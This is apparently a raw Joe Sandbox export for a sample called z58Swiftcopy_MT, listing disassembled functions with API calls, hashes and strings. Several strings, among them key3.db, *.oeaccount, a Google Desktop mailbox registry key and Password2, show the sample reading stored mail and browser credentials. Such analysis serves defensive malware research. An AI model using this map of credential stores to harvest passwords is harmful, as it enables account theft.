                                                                                                                                                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                                      • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2374668499-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A4C
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,762D0A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                                                                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                                                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID: Ul@$key3.db
                                                                                                                                                                                                                                      • API String ID: 1968906679-1563549157
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                                      • String ID: smtp
                                                                                                                                                                                                                                      • API String ID: 2625860049-60245459
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                                                                                                      • API String ID: 714388716-917056472
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                                      • String ID: 3CD
                                                                                                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                                      • String ID: Password2
                                                                                                                                                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                                      • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                      • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
